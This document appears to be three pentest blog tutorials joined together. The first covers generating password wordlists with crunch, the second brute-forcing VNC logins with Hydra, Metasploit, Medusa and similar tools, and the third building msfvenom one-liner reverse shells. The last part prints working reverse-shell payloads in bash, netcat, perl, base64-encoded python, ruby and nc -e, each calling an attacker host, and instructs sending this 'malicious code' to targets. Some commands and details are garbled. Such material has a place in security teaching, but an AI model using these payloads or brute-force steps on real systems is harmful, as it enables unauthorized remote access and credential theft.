Comprehensive Guide to Crunch Tool

 Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist for username either password using the most powerful tool CRUNCH. In kali Linux you can easily get crunch by exploring Application > Password Attacks > Crunch

Crunch can generate a wordlist subject to the conditions you specify and its output file can be used in any other another program or file.

We are using crunch version 3.6 for this tutorial and followed given below parameters for generating wordlist.

Syntax: [character-string] [options]

Min-len:  This parameter specify minimum length string required for crunch to start generating wordlist.

Max-len: This parameter specify maximum length string required for crunch to end.

Charset string: This parameter specify character sets for crunch to use for generating wordlist from that string, if you have not specified any string then crunch will default characters string.

Options: crunch serves you a list of options which increase its functionality for generating wordlist as per your requirement.

Generating wordlist without using character string

Execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using default character sets. It will start from aa and end with zzz.

crunch 2 3 -o  /root/Desktop/0.txt

Here we had used following parameters for generating a dictionary:

Min_len: 2 for two character letters

Max_len: 3 for three character letters

-o: This option denotes the path to save the output in a text file.

From given below image you can observe that it has generated 18252 number of lines and saved in 0.txt file.

Now here we had used cat command to read the content from inside 0.txt file where we can perceive that it has start from aa and end with zzz as shown in given below image.

cat /root/Desktop/0.txt

Generating wordlist using character string

Now execute given below command which will generate a dictionary that contains minimum 3 character letters and maximum 4 by using “raj” as specified string. Similarly it will start from rrr and end with jjjj.

crunch 3 4  raj -o  /root/Desktop/1.txt

From given below image you can observe that it has generated 108 number of lines and saved in 1.txt file.

Now we had used cat command to read the content from inside 1.txt file where we can perceive that it has start from rrr and end with jjjj.

cat /root/Desktop/1.txt

Similarly we can use string of any number for making a dictionary which contains numeric characters.

For example: some users set their date of birth as password and we would like to generate a dictionary that contains combination of four number such that it represent month and date for instant 25^th May as 2505 then you can use “2505” as character string for generating a numeric wordlist.

 

 Generating alpha-numeric wordlist

You can generate you own alpha-numeric wordlist, execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using “raj123” as specified string. 

You can set minimum and maximum length for your wordlist as per your requirement.

crunch 2 4  raj123 -o  /root/Desktop/3.txt

Again we had used cat command to read the content from inside 3.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/3.txt

Generating wordlist along with space character

Following command will generate wordlist using space character (\) with string “raj”. Instead of using (\) you can also use double quotes around string as “raj ” along with space within double quotes. 

crunch 1 3  raj\ -o  /root/Desktop/4.txt

Create wordlist using character set file of RainbowCrack

As we known rainbow crack has a character set file which is used for cracking hashes by using rainbow table, but we’ll use this character set file for generating a complex wordlist as per situation demands.

cat /usr/share/rainbowcrack/charset.txt

We had used cat command to express the list of character set that has been stored in charset.txt of rainbowcrack.  From given below image you can observed that it is showing following list of character set.

·         Numeric

·         Alpha

·         Alpha-numeric

·         Loweralpha

·         Loweralpha numeric

·         Mixalpha

·         Mixalpha-numeric

·         Ascii -32-95

·         Ascii -32-65-123-4

·         Alpha-numeric-symbol32-space

Now you can choose any character set for generating wordlist. Let suppose I want to generate a wordlist which contains lower alphabets letter along with numeric number for 5 letter words so for that I will execute following command.

crunch  4 5  -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o  /root/Desktop/5.txt

Here –f denotes Specifies a character set from the charset.lst

Again we had used cat command to read the content from inside 5.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/5.txt

Generate wordlist with specific Pattern

Crunch provides –t option to generate a wordlist using a specific pattern as per your requirement.

Using option –t you can generate 4 type patters as specified below:

·         Use @ for lowercase alphabets

·         Use , for uppercase alphabets

·         Use % for numeric character

·         Use ^ for special character symbol

For generating a wordlist that contains 3 numeric characters on the right side of string “raj” for instant raj123, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more numeric number after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj%%% -o/root/Desktop/6.txt

Here –t denotes % pattern is used for editing 3 numeric character.

Again we had used cat command to read the content from inside 6.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/6.txt

Generate wordlist with Duplicate character limit

Crunch let you bound the repetition of character by using –d parameters along with the given pattern. 

As we saw, above the pattern for raj%%% starts with raj000 which means every single number will consecutive either twice or thrice such as it will contain word as raj000, raj001, raj111, raj110 and so on in the wordlist.

If you don’t wish to create a wordlist with repeated number then you can use –d option to set filter for repetition.

For example: I want to generate a wordlist by using above pattern i.e. raj%%% and consecutive repetition of each number almost twice. For implementing such type of dictionary we need to execute below command.

crunch 6 6 -t raj%%% -d 2% -o/root/Desktop/6.1.txt

here we had use following parameter

–t denotes % pattern is used for editing 3 numeric character

-d denote % pattern is used for editing 3 numeric character with repetition of each number almost twice.

Again we had used cat command to read the content from inside 6.1.txt file where we can perceive that it has combination of alpha-numeric character with repetition of each number two times.

cat /root/Desktop/6.1.txt

Now if you will compare output file 6.txt and 6.1.txt then you can notice difference of number repetition.

Generate wordlist with Pattern for uppercase letter

For generating a wordlist that contains 3 uppercase characters on the right side of string “raj” for instant rajABC, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more uppercase letter after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj,,, -o/root/Desktop/7.txt

Here –t denotes (,) pattern is used for editing 3 uppercase letter character.

Again we had used cat command to read the content from inside 7.txt file where we can perceive that it has combination of mix-alpha character.

cat /root/Desktop/7.txt

Similarly we can set limit for uppercase letter repletion as done above. So if I want that alphabets should not be consecutive then we can execute given below command for generating such type of dictionary.

crunch 6 6 -t raj,,, -d 1, -o/root/Desktop/7.1.txt

–t denotes (,) pattern is used for editing 3 uppercase character

-d denote (,) pattern is used for editing 3 uppercase character with repetition of each number almost one.

Again we had used cat command to read the content from inside 7.1.txt file where we can perceive that it has combination of mix-alpha character with repetition of each number two times.

cat /root/Desktop/7.1.txt

Now if you will compare output file 7.txt and 7.1.txt then you can notice difference of alphabet repetition.

Use Permutation for generating wordlist

-p option is used for generating wordlist with help of permutation, here can ignore min and max length of character string. Moreover it can be used with one word string or multiple words string as given below.

crunch 3 6 –p raj chandel hackingarticles

From given below image you can analysis the output result and get maximum number of permutation generated.

Generate Dictionary with limited words

If you will observe above all output result then you will find crunch has generated dictionary and displays the number of line for each dictionary. For instance text file 0.txt has 18525 number of line and each line contains one word only.

So if you wish to set filter for certain number of line should be generated then execute given below line.

crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It will generate a dictionary of 25 words only and save output in 8.txt.

Again we had used cat command to read the content from inside8.txt file where we can perceive that it has only 25 alpha character.

cat /root/Desktop/8.txt

Wordlist Fragmentation

Use –b option for wordlist fragmentation that split a single wordlist into multi wordlist. It is quite useful option for dividing wordlist which is in GB can break into MB.

crunch 5 7 raj@123 -b 3mb –o START

From given below image you can observe that it has divided a 7MB file into three text file.

Generate compressed Dictionary

Crunch let you generate compress wordlist with option –z and other parameters are gzip, bzip2, lzma, and 7z, execute given below command for compression.

crunch 5 7 raj@123 –z gzip –o START

From given below image you can observe that it has generated compress text file.

6 Ways to Hack VNC Login Password

In this article, we will learn how to gain control over our victim’s PC through 5900 Port use for VNC service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

 Let’s starts!!

xHydra 

This is the graphical version to apply dictionary attack via 5900 port to hack a system. For this method to work:

Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select VNC in box against Protocol option and give the port number 5900 against the port option

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

-P:  denotes path for password list

-s: denote destination port number

-t: Run TASKS number of connects in parallel

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the VNC password as 098765

Metasploit

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6

msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/vnc/vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765 have been found by metasploit

Patator

 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as VNC, HTTP, SMB and etc.

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, VNC, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Here

-u: denotes username

-P:  denotes path for password list

As you can observe that we had successfully grabbed the VNC password as 098765.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the vnc password as 098765.

Spawn TTY Shell using Msfvenom (One Liner Payload)

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in metasploit.

Basically there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is suedo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your kali Linux and type msfconsole to load metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.

search cmd/unix

From given below image you can observed that it has dump all exploit that can be used to compromised any UNIX system. In this tutorial we are going to use some of payloads to spawn a TTY shell.

Compromise Bash shell

In order to compromise a bash shell you can use reverse_bash  payload along msfvenom as given in below command.

msfvenom –p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_bash

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when target will open (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 1111

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

whoami: it tells you are root user of the system you have compromised.

Compromise Netcat shell

In order to compromise a netcat shell you can use reverse_netcat payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when target will open ( mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0

/tmp/admson 2>&1; rm /tmp/admoszx ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 2222

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell.

Compromise Perl shell

In order to compromise a perl shell you can use reverse_perl payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_perl

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when target will open (perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.103:3333");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};) ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 3333

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell. Here we found target IP address: 192.168.1.1106 by executing ifconfig command in his TTY shell.

Compromise Python shell

In order to compromise a python shell you can use reverse_Python payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_python

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, attacker will get reverse shell through netcat.

python -c "exec('aW1wb3J0IHNvY2tldCAgICAgICAgICwgICAgICAgIHN1YnByb2Nlc3MgICAgICAgICAsICAgICAgICBvcyAgICAgOyAgICAgIGhvc3Q9IjE5Mi4xNjguMS4xMDMiICAgICA7ICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICAgICAgLCAgICAgICAgc29ja2V0LlNPQ0tfU1RSRUFNKSAgICAgOyAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAgICAgICwgICAgICAgIHBvcnQpKSAgICAgOyAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgICAgICwgICAgICAgIDApICAgICA7ICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICAgICAgLCAgICAgICAgMSkgICAgIDsgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICAgICAsICAgICAgICAyKSAgICAgOyAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"

nc -lvp 4444

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Compromise Ruby shell

In order to compromise a ruby shell you can use reverse_ruby payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_ruby

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open (ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end') malicious code in his terminal, attacker will get reverse shell through netcat.

nc -lvp 5555

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Compromise bin/sh shell

In order to compromise a command shell you can use reverse_netcat_gaping payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat_gaping

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access bin/sh shell of target system for compromising TTY shell firslty we had access PTs termianl  of  target through SSH and then past the malicious code (nc 192.168.1.103 6666 -e /bin/sh

) inside PTY terminal.

nc -lvp 6666

From given below image you can observe that we had successfully access TTy shell of target system.